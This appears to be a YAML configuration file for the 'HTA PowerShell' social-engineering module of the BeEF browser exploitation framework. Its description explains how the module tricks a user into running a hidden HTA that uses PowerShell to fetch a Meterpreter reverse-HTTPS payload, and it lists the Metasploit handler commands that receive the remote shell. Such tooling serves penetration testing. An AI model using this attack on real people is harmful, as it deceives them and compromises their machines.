beef/modules/social_engineering/hta_powershell/config.yaml

#
# Copyright (c) 2006-2026 Wade Alcorn - wade@bindshell.net
# Browser Exploitation Framework (BeEF) - https://beefproject.com
# See the file 'doc/COPYING' for copying permission
#
beef:
    module:
        hta_powershell:
            enable: true
            category: ["Social Engineering"]
            name: "HTA PowerShell"
            description: "Tricks the user into opening and allowing the execution of an HTML Application (HTA), appended to the DOM into an hidden IFrame.<br> If the user allows execution, powershell is used to download the payload (by @mattifestation) from BeEF.<br><br> The default payload is windows/meterpreter/reverse_https, and the attack works on both x86 and x86_64 targets.<br><br>Before launching the module, do the following on Metasploit:<br>use exploit/multi/handler<br>set PAYLOAD windows/meterpreter/reverse_https<br>set LHOST x.x.x.x<br>set LPORT 443<br>set ExitOnSession false<br>set AutoRunScript post/windows/manage/smart_migrate<br>exploit -j -z"
            authors: ["antisnatchor"]
            target:
                user_notify: ["IE"]
                not_working: ["ALL"]